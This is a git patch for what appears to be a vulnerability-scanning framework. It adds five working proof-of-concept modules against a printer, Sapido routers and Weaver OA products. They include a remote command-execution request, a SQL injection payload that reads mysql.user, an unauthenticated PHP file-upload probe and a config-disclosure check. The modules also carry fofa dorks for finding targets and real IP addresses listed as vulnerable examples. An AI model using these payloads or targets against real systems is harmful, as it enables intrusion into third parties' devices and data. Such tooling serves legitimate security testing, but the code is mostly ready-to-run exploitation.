From aadd14b056ce9cca99fc60e5cda63342830ff335 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E8=8E=B1=E6=98=82=E7=BA=B3=E5=A4=9A=E9=98=81=E4=B8=8B?= <36789699+bigblackhat@users.noreply.github.com> Date: Fri, 21 Jan 2022 09:38:47 +0800 Subject: [PATCH] 2.23.0 --- docs/CHANGELOG.md | 10 +++ poc/MC573/MC573_Unauth_Access/poc.py | 75 ++++++++++++++++ poc/Sapido/Rce_sapido_BRC70n/poc.py | 72 ++++++++++++++++ .../Config_Info_Disclosure_E-cology_V9/poc.py | 77 +++++++++++++++++ poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py | 85 +++++++++++++++++++ .../Sql_inj_E_office_V9.5/poc.py | 75 ++++++++++++++++ 6 files changed, 394 insertions(+) create mode 100644 poc/MC573/MC573_Unauth_Access/poc.py create mode 100644 poc/Sapido/Rce_sapido_BRC70n/poc.py create mode 100644 poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py create mode 100644 poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py create mode 100644 poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py diff --git a/docs/CHANGELOG.md b/docs/CHANGELOG.md index f184c75..0ed5eb4 100644 --- a/docs/CHANGELOG.md +++ b/docs/CHANGELOG.md @@ -699,6 +699,16 @@ > 新增了对DNS Log平台--Ceye的支持,oFx现已支持无回显漏洞的检测,具体细节见coding +## version 2.23.0 +------------------ +> 新增POC: +* ``MC573未授权访问`` +* ``sapido BRC70n路由器远程代码执行漏洞`` +* ``泛微-e-cologyV9信息泄露`` +* ``泛微E-office V9.5 SQL注入漏洞`` +* ``泛微e-office存在前台文件上传漏洞`` + + ``` =============== |以上为当前版本| diff --git a/poc/MC573/MC573_Unauth_Access/poc.py b/poc/MC573/MC573_Unauth_Access/poc.py new file mode 100644 index 0000000..05fbc8a --- /dev/null +++ b/poc/MC573/MC573_Unauth_Access/poc.py @@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-12", # POC创建时间 + "UpdateDate" : "2022-01-12", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "MC573未授权访问", # 漏洞名称 + "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "MC573未授权访问", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + IKO MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作 + """, # 漏洞简要描述 + + "fofa-dork":""" + "MC573" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + # timeout = 10 + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/" # url自己按需调整 + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "MC573" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/Sapido/Rce_sapido_BRC70n/poc.py b/poc/Sapido/Rce_sapido_BRC70n/poc.py new file mode 100644 index 0000000..0a1036d --- /dev/null +++ b/poc/Sapido/Rce_sapido_BRC70n/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-10", # POC创建时间 + "UpdateDate" : "2022-01-10", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "sapido BRC70n路由器远程代码执行漏洞", # 漏洞名称 + "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "BR270n-v2.1.03,BRC76n-v2.1.03,GR297-v2.1.3,RB1732-v2.0.43", # 漏洞应用版本 + "VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="sapido-路由器" + """, # fofa搜索语句 + "example" : "http://122.116.238.251:1080", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/boafrm/formSysCmd" # url自己按需调整 + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "sysCmd=ifconfig&apply=Apply&submit-url=%2Fsyscmd.htm&msg=" + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers , data=data,proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code ==200 and "Link encap:Ethernet" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() + diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py new file mode 100644 index 0000000..d36ff03 --- /dev/null +++ b/poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py @@ -0,0 +1,77 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase + +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-1-10", # POC创建时间 + "UpdateDate" : "2022-1-10", # POC创建时间 + "PocDesc" : """ + 这个API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口:/api/ec/dev/app/test + + """, # POC描述,写更新描述,没有就不写 + + "name" : "泛微-e-cologyV9信息泄露", # 漏洞名称 + "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "泛微-e-cology", # 漏洞应用名称 + "AppVersion" : "无", # 漏洞应用版本 + "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + 可以获取到响应的ec_id值和对应的IP泛微移动管理平台的地址 + """, # 漏洞简要描述 + + "fofa-dork":"", """ + app="泛微-EOffice" + """ # fofa搜索语句 + "example" : "http://106.75.133.16:9000/api/ec/dev/app/test", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + + } + + timeout = 10 + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/api/ec/dev/app/test" # url自己按需调整 + # date="command1=shell:ifconfig| dd of=/tmp/a.txt" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False) + if req.status_code == 200 and "ec_id" and "ec_url" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py b/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py new file mode 100644 index 0000000..8c1734f --- /dev/null +++ b/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py @@ -0,0 +1,85 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +import re +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-1-10", # POC创建时间 + "UpdateDate" : "2022-1-10", # POC创建时间 + "PocDesc" : """ + 原POC逻辑过于简单,存在大量误报,现已优化 + """, # POC描述,写更新描述,没有就不写 + + "name" : "泛微e-office存在前台文件上传漏洞" , # 漏洞名称 + "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "泛微-EOffice", # 漏洞应用名称 + "AppVersion" : "无", # 漏洞应用版本 + "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """ , # 漏洞简要描述 + + "fofa-dork":"" , """ + app="泛微-EOffice" + """ # fofa搜索语句 + "example" : "http://219.153.106.177:81/", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + + } + + timeout = 10 + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url自己按需调整 + # date="command1=shell:ifconfig| dd of=/tmp/a.txt" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + data = """Content-Type: multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff + +--12f83ada5e3c205e29da579b538944ff +Content-Disposition: form-data; name="upload_quwan"; filename="test.php4" +Content-Type: application/octet-stream + + +--12f83ada5e3c205e29da579b538944ff +""" + try: + """ + 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False) + result = re.match("\[\d,\".+\",\d{10},\"\.\"\]",req.text.strip()) + if req.status_code == 200 and result != None: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py b/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py new file mode 100644 index 0000000..b7df963 --- /dev/null +++ b/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py @@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-15", # POC创建时间 + "UpdateDate" : "2022-01-15", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "泛微E-office V9.5 SQL注入漏洞", # 漏洞名称 + "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "泛微E-Office", # 漏洞应用名称 + "AppVersion" : "泛微 E-Office V9.5 20211208", # 漏洞应用版本 + "VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="泛微-EOffice" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + # timeout = 10 + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/building/subject/tables/json.php" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "tfs=mysql.user--+|1|" + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers , data=data, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "[\"root\"]" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify()